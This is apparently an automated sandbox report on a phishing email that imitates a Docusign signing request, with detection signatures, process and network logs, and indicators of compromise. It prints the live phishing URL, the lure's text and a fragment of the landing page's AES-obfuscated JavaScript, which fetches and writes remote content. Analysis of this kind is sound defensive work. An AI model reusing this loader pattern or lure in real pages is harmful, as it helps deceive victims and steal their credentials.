Edit tour

Windows Analysis Report
FW Complete with Docusign Remittance Advice .pdf.eml

Overview

General Information

Sample name:	FW Complete with Docusign Remittance Advice .pdf.eml
Analysis ID:	1544787
MD5:	dc34a3c1973f12dade5f299f93b62106
SHA1:	b091c4899cea2ef9e68a07549d55146d82509f15
SHA256:	14b797c738565070487e010d986b2d8767cb60cf57d0fc47bc9efdaeaf649c1b
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish70

AI detected potential phishing Email

Phishing site detected (based on shot match)

Suspicious MSG / EML detected (based on various text indicators)

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML title does not match URL

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Sigma detected: Office Autorun Keys Modification

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 6316 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\FW Complete with Docusign Remittance Advice .pdf.eml" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 2532 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "28C84706-2309-4AB0-A66E-7AC5589B0CDB" "08CC6BE9-FD18-463A-AD81-0A07368353E9" "6316" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

chrome.exe (PID: 4780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://eu.docusign.net/Signing/EmailStart.aspx?a=9eb1232d-b669-47cc-b565-df3c91f4d5f7&etti=24&acct=abba683f-186c-4f9e-8ab2-ac0f68fbe569&er=ad16d7d0-2faa-44b9-8c84-a75ce167beb2 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1976,i,9062327613063570313,3700824019867659727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
2.7.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

Sigma Signatures

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish70

Source: Yara match

File source: 2.7.pages.csv, type: HTML

Phishing site detected (based on shot match)

Source: https://cosiosos.com.de/7i2ko/

Matcher: Template: captcha matched

Suspicious MSG / EML detected (based on various text indicators)

Source: MSG / EML

OCR Text: docusign Keitner Haydon sent you a document to review and sign. REVIEW DOCUMENT Keitner Haydon hkeitner@nixcnpeabody.com mknott@phoenixcrane.com, Complete with Docusign: Remittance Advice .pdf Thank You, Keitner Haydon Do Not Share This Email This email contains a secure link to Docusign. Please do not share this email, link, or access code with others. Alternate Signing Method Visit Docusign.com, click 'Access Documents', and enter the security code: 9EB1232DB66947CCB565DF3C91 F4D5F74 About Docusign Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- Docusign provides a professional trusted solution for Digital Transaction Management TM Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. Stop receiving this email Report this email or read more about Declining to sign and Managing notifications. If you have trouble signing, visit "How to Sign a Document" on our Docusign Support Center, or browse our Docusign Community for more information. Download the Docusign App This message was sent to you by Keitner Haydon who is using the Docusign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request.

Source: https://cosiosos.com.de/7i2ko/

HTTP Parser: Number of links: 0

Source: https://cosiosos.com.de/7i2ko/

HTTP Parser: Base64 decoded: {"a":"A3KVglQ3qTtA\/QD0GP0e4F6I3\/qfFmpclAotssmi7LQ=","c":"2e2961b74d04e46119603ea02e65b13a","b":"0c719901e6775460a9456a9df3bb57a86771c97f38249875105b084bbf064bedf213c23cd16a41c477197fa97e5a1126a4bb3b7bbdd8dc2b704a13c76145cc99790e78c5c00ee5af47a45794336c4...

Source: https://cosiosos.com.de/7i2ko/

HTTP Parser: Title: Custom Creations Car Society - flifeserieso.ru does not match URL

Source: https://cosiosos.com.de/7i2ko/

HTTP Parser: asyncfunction cacophony(cabdriver) {var {a,b,c,d} = json.parse(cabdriver); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d),cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8,iterations: 999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } (async()=> {document.write(await cacophony(await (await fetch(awaitcacophony(atob(`eyjhijoiqtnlvmdsutnxvhrbxc9rrdbhudblney2stncl3fmrm1wy2xbb3rzc21pn0xrpsisimmioiiyzti5njfinzrkmdrlndyxmtk2mdnlytayzty1yjezysisimiioiiwyzcxotkwmwu2nzc1ndywytk0ntzhowrmm2jintdhody3nzfjotdmmzgyndk4nzuxmdvimdg0ymjmmdy0ymvkzjixm2mym2nkmtzhndfjndc3mtk3zme5n2u1ytexmjzhngjim2i3ymjkzdhkyzjinza0ytezyzc2mtq1y2m5otc5mgu3ogm1yzawzwu1ywy0n2e0ntc5ndmznmm0ogu5zwjkotnkzwzlmje2nzvizdg3ztkymwzlntkxyzixyjhmnmu3njk1zmi1nzi1ndk3y2rjmdlknjq2ytrkm2e3mjdlntvkn2eyzjcyy2y4n2jimzi0n2e1mzc2zgqzngzmyjuxmzbizta1nmjjndewmtjhywy3ody3oguwotaxnjjkztrhn2mxzda4ytjizdhmyjlhnwuymdqzmdi3mdcxyta4odjizdkxymzhngnmnwu5ytc...

Source: https://cosiosos.com.de/7i2ko/	HTTP Parser: No favicon
Source: https://cosiosos.com.de/7i2ko/	HTTP Parser: No favicon
Source: https://cosiosos.com.de/7i2ko/	HTTP Parser: No favicon
Source: https://cosiosos.com.de/7i2ko/	HTTP Parser: No favicon

Source: https://cosiosos.com.de/7i2ko/

HTTP Parser: No <meta name="author".. found

Source: https://cosiosos.com.de/7i2ko/

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49826 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox View	IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View	IP Address: 104.18.65.57 104.18.65.57

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nml3ll1nFVeUPX2&MD=cANLcvmX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /ds_arya_wrapper.min.js?f=1 HTTP/1.1Host: a.docusign.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.docusign.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ds_arya_wrapper.min.js?f=1 HTTP/1.1Host: a.docusign.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ds_a=cd6c8418-b7c8-4e41-b700-1d78e22b3590
Source: global traffic	HTTP traffic detected: GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyIkb3MiOiAiV2luZG93cyIsIiRicm93c2VyIjogIkNocm9tZSIsIiRyZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIiRzY3JlZW5faGVpZ2h0IjogMTAyNCwiJHNjcmVlbl93aWR0aCI6IDEyODAsIm1wX2xpYiI6ICJ3ZWIiLCJkaXN0aW5jdF9pZCI6ICIxOTJkOTYxYzEwNzY5NS0wOWFjYjQ3NGRiYWEzZi0yNjAzMWU1MS0xNDAwMDAtMTkyZDk2MWMxMDg2ZDciLCIkaW5pdGlhbF9yZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIm1wX3BhZ2UiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfcmVmZXJyZXIiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfYnJvd3NlciI6ICJDaHJvbWUiLCJtcF9wbGF0Zm9ybSI6ICJXaW5kb3dzIiwidG9rZW4iOiAiMzA0Y2NiZGUyNGQzYjE1ZmZlMmQ1ZGUzMGMxMGRhYjIifX0%3D&ip=1&_=1730223915277 HTTP/1.1Host: api.mixpanel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://eu.docusign.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.docusign.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyIkb3MiOiAiV2luZG93cyIsIiRicm93c2VyIjogIkNocm9tZSIsIiRyZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIiRzY3JlZW5faGVpZ2h0IjogMTAyNCwiJHNjcmVlbl93aWR0aCI6IDEyODAsIm1wX2xpYiI6ICJ3ZWIiLCJkaXN0aW5jdF9pZCI6ICIxOTJkOTYxYzEwYTQ0Mi0wNGYyZjVjYTQ1YjliLTI2MDMxZTUxLTE0MDAwMC0xOTJkOTYxYzEwYjU5NiIsIiRpbml0aWFsX3JlZmVycmluZ19kb21haW4iOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfcGFnZSI6ICJldS5kb2N1c2lnbi5uZXQiLCJtcF9yZWZlcnJlciI6ICJldS5kb2N1c2lnbi5uZXQiLCJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJ0b2tlbiI6ICI2MjQ0YmI5ZTMxZGY2ZDhkY2Y4YzQxMzVkZWZlNjQ2MCJ9fQ%3D%3D&ip=1&_=1730223915278 HTTP/1.1Host: api.mixpanel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://eu.docusign.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.docusign.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyIkb3MiOiAiV2luZG93cyIsIiRicm93c2VyIjogIkNocm9tZSIsIiRyZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIiRzY3JlZW5faGVpZ2h0IjogMTAyNCwiJHNjcmVlbl93aWR0aCI6IDEyODAsIm1wX2xpYiI6ICJ3ZWIiLCJkaXN0aW5jdF9pZCI6ICIxOTJkOTYxYzEwNzY5NS0wOWFjYjQ3NGRiYWEzZi0yNjAzMWU1MS0xNDAwMDAtMTkyZDk2MWMxMDg2ZDciLCIkaW5pdGlhbF9yZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIm1wX3BhZ2UiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfcmVmZXJyZXIiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfYnJvd3NlciI6ICJDaHJvbWUiLCJtcF9wbGF0Zm9ybSI6ICJXaW5kb3dzIiwidG9rZW4iOiAiMzA0Y2NiZGUyNGQzYjE1ZmZlMmQ1ZGUzMGMxMGRhYjIifX0%3D&ip=1&_=1730223915277 HTTP/1.1Host: api.mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyIkb3MiOiAiV2luZG93cyIsIiRicm93c2VyIjogIkNocm9tZSIsIiRyZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIiRzY3JlZW5faGVpZ2h0IjogMTAyNCwiJHNjcmVlbl93aWR0aCI6IDEyODAsIm1wX2xpYiI6ICJ3ZWIiLCJkaXN0aW5jdF9pZCI6ICIxOTJkOTYxYzEwYTQ0Mi0wNGYyZjVjYTQ1YjliLTI2MDMxZTUxLTE0MDAwMC0xOTJkOTYxYzEwYjU5NiIsIiRpbml0aWFsX3JlZmVycmluZ19kb21haW4iOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfcGFnZSI6ICJldS5kb2N1c2lnbi5uZXQiLCJtcF9yZWZlcnJlciI6ICJldS5kb2N1c2lnbi5uZXQiLCJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJ0b2tlbiI6ICI2MjQ0YmI5ZTMxZGY2ZDhkY2Y4YzQxMzVkZWZlNjQ2MCJ9fQ%3D%3D&ip=1&_=1730223915278 HTTP/1.1Host: api.mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /datafiles/MUGKFLCdCtxUSgrSTyhbw.json HTTP/1.1Host: cdn.optimizely.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://eu.docusign.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.docusign.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /datafiles/MUGKFLCdCtxUSgrSTyhbw.json HTTP/1.1Host: cdn.optimizely.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nml3ll1nFVeUPX2&MD=cANLcvmX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /track/?data=eyJldmVudCI6ICJDb25zZW50IEFjY2VwdGVkIiwicHJvcGVydGllcyI6IHsiJG9zIjogIldpbmRvd3MiLCIkYnJvd3NlciI6ICJDaHJvbWUiLCIkcmVmZXJyaW5nX2RvbWFpbiI6ICJldS5kb2N1c2lnbi5uZXQiLCIkc2NyZWVuX2hlaWdodCI6IDEwMjQsIiRzY3JlZW5fd2lkdGgiOiAxMjgwLCJtcF9saWIiOiAid2ViIiwiZGlzdGluY3RfaWQiOiAiYjE0NDZmZjMyN2YyNTNjN2YyNWQ3MjNkZjM4MTNiYjBkYzZlNzVkNiIsIiRpbml0aWFsX3JlZmVycmluZ19kb21haW4iOiAiZXUuZG9jdXNpZ24ubmV0IiwiUG9zdCBTaWduaW5nIERpYWxvZyI6ICJTYXZlIEEgQ29weSIsIkVudmVsb3BlIElEIjogIjc4NDJkOGRiNTE1ZThlYTliYmVmNGZhMTBhYWU2NWUzMWE5ODIwMjAiLCJSZWNpcGllbnQgSUQiOiAiOWE5NTk2Y2NjMWU1YmE3Y2M1MmMyYjk2MTFhZGYxNGM0YmEwZWE4OCIsIlNpZ25lciBJRCI6ICJiMTQ0NmZmMzI3ZjI1M2M3ZjI1ZDcyM2RmMzgxM2JiMGRjNmU3NWQ2IiwiQnJvd3NlciBWZXJzaW9uIjogIkNocm9tZSAxMzAuMCIsIkZpZWxkcyBSZWNpcGllbnQiOiAiMCIsIkZpZWxkcyBFbnZlbG9wZSI6ICIxIiwiUmVxdWlyZWQgRmllbGRzIjogIjAiLCJMYW5ndWFnZSI6ICJlbiIsIlNpZ25pbmcgQWNjZXNzIjogIlJlbW90ZSIsIkF1dG9OYXYgUnVsZXMiOiAiRmllbGRzUmVxdWlyZWQiLCJSZWNpcGllbnRzIjogIjUwIiwiUmVjaXBpZW50IFR5cGUiOiAiU2lnbmVyIiwiUmVjaXBpZW50cyBXb3JrZmxvdyI6ICI1MCIsIlNlbmRlciBBY2NvdW50IElEIjogIjUyZTkwNDkwNGMwZTkzOWM3N2U3OGRkZDRjYmQ5ZTBkYmU4NDFmODMiLCJBY2NvdW50IElEIjogIjE5YjUyNjMyOTRjNmMzN2RiNjc4YzlhYTRmYmYwMGQzODM0ZjRiMWIiLCJCcmFuZGVkIjogZmFsc2UsIkJyYW5kZWQgTG9nbyI6IGZhbHNlLCJCcmFuZGVkIENvbG9yIjogZmFsc2UsIkJyYW5kZWQgRmlsZSI6IGZhbHNlLCJDb25jYXQgTW9kZSI6IGZhbHNlLCJBdHRhY2htZW50IEFkZGVkIjogZmFsc2UsIkF0dGFjaG1lbnQgQ291bnQiOiAwLCJBdHRhY2htZW50IE1ldGhvZCI6IG51bGwsIlBhZ2VzIjogIjEiLCJEb2NzIjogIjEiLCJBdXRoZW50aWNhdGlvbiI6ICJOb25lIiwiTG9nZ2VkIEluIjogZmFsc2UsIkNvbnNlbnQgU2hvd24iOiB0cnVlLCJBY2NvdW50IEhvbGRlciI6IGZhbHNlLCJGaWVsZCBTaWduYXR1cmUiOiBmYWxzZSwiRmllbGQgSW5pdGlhbCI6IGZhbHNlLCJGaWVsZCBTdGFtcCI6IGZhbHNlLCJGaWVsZCBEYXRlIjogZmFsc2UsIkZpZWxkIFRleHQiOiBmYWxzZSwiRmllbGQgTmFtZSI6IGZhbHNlLCJGaWVsZCBDb21wYW55IjogZmFsc2UsIkZpZWxkIFRpdGxlIjogZmFsc2UsIkZpZWxkIEVtYWlsIjogZmFsc2UsIkZpZWxkIENoZWNrYm94IjogZmFsc2UsIkZpZWxkIFJhZGlvIjogZmFsc2UsIkZpZWxkIERyb3Bkb3duIjogZmFsc2UsIkZpZWxkIEF0dGFjaG1lbnQiOiBmYWxzZSwiRmllbGQgTm90ZSI6IGZhbHNlLCJGaWVsZCBBcHByb3ZlIjogZmFsc2UsIkZpZWxkIERlY2xpbmUiOiBmYWxzZSwiRmllbGQgVmlldyI6IGZhbHNlLCJGaWVsZCBGb3JtdWxhIjogZmFsc2UsIlRlbXBsYXRlIFVzZWQiOiBmYWxzZSwiU3VwcGxlbWVudGFsIERvY3VtZW50IENvdW50IjogMCwiU3VwcGxlbWVudGFsIERvY3VtZW50IFJlcXVpcmVtZW50cyI6ICIiLCJBdXRvQ29tcGxldGUgRW5hYmxlZCI6IGZhbHNlLCJwcm9kdWN0IGFyZWEiOiAiU2lnbmluZyIsIkZyZWVmb3JtIjogZmFsc2UsIlNpZ25pbmdFeHRlbnNpb25zIjogdHJ1ZSwiQnJvd3NlciBXaWR0aCBJbml0aWFsIjogMTI4MCwiQnJvd3NlciBIZWlnaHQgSW5pdGlhbCI6IDkwNywiQnJvd3NlciBXaWR0aCI6IDEyODAsIkJyb3dzZXIgSGVpZ2h0IjogOTA3LCJTZXNzaW9uIEFib3V0IHRvIEV4cGlyZSBDb3VudCI6IDAsIlRvcCBGaW5pc2ggSGlkZGVuIjogZmFsc2UsIlBvd2VyRm9ybSI6IGZhbHNlLCJBL0IgVGVzdHMiOiAiaWZyYW1lbGVzczogbW9iaWxlIiwiUG93ZXJmb3JtIFNlbmRlciI6IGZhbHNlLCJQbGF0Zm9ybSI6ICJXZWIgQXBwIiwiRFNfQSI6ICJjZDZjODQxOC1iN2M4LTRlNDEtYjcwMC0xZDc4ZTIyYjM1OTAiLCJ0b2tlbiI6ICIzMDRjY2JkZTI0ZDNiMTVmZmUyZDVkZTMwYzEwZGFiMiJ9fQ%3D%3D&ip=1&_=1730223972817 HTTP/1.1Host: api.mixpanel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium"
Source: global traffic	HTTP traffic detected: GET /track/?data=eyJldmVudCI6ICJDb25zZW50IEFjY2VwdGVkIiwicHJvcGVydGllcyI6IHsiJG9zIjogIldpbmRvd3MiLCIkYnJvd3NlciI6ICJDaHJvbWUiLCIkcmVmZXJyaW5nX2RvbWFpbiI6ICJldS5kb2N1c2lnbi5uZXQiLCIkc2NyZWVuX2hlaWdodCI6IDEwMjQsIiRzY3JlZW5fd2lkdGgiOiAxMjgwLCJtcF9saWIiOiAid2ViIiwiZGlzdGluY3RfaWQiOiAiYjE0NDZmZjMyN2YyNTNjN2YyNWQ3MjNkZjM4MTNiYjBkYzZlNzVkNiIsIiRpbml0aWFsX3JlZmVycmluZ19kb21haW4iOiAiZXUuZG9jdXNpZ24ubmV0IiwiUG9zdCBTaWduaW5nIERpYWxvZyI6ICJTYXZlIEEgQ29weSIsIkVudmVsb3BlIElEIjogIjc4NDJkOGRiNTE1ZThlYTliYmVmNGZhMTBhYWU2NWUzMWE5ODIwMjAiLCJSZWNpcGllbnQgSUQiOiAiOWE5NTk2Y2NjMWU1YmE3Y2M1MmMyYjk2MTFhZGYxNGM0YmEwZWE4OCIsIlNpZ25lciBJRCI6ICJiMTQ0NmZmMzI3ZjI1M2M3ZjI1ZDcyM2RmMzgxM2JiMGRjNmU3NWQ2IiwiQnJvd3NlciBWZXJzaW9uIjogIkNocm9tZSAxMzAuMCIsIkZpZWxkcyBSZWNpcGllbnQiOiAiMCIsIkZpZWxkcyBFbnZlbG9wZSI6ICIxIiwiUmVxdWlyZWQgRmllbGRzIjogIjAiLCJMYW5ndWFnZSI6ICJlbiIsIlNpZ25pbmcgQWNjZXNzIjogIlJlbW90ZSIsIkF1dG9OYXYgUnVsZXMiOiAiRmllbGRzUmVxdWlyZWQiLCJSZWNpcGllbnRzIjogIjUwIiwiUmVjaXBpZW50IFR5cGUiOiAiU2lnbmVyIiwiUmVjaXBpZW50cyBXb3JrZmxvdyI6ICI1MCIsIlNlbmRlciBBY2NvdW50IElEIjogIjUyZTkwNDkwNGMwZTkzOWM3N2U3OGRkZDRjYmQ5ZTBkYmU4NDFmODMiLCJBY2NvdW50IElEIjogIjE5YjUyNjMyOTRjNmMzN2RiNjc4YzlhYTRmYmYwMGQzODM0ZjRiMWIiLCJCcmFuZGVkIjogZmFsc2UsIkJyYW5kZWQgTG9nbyI6IGZhbHNlLCJCcmFuZGV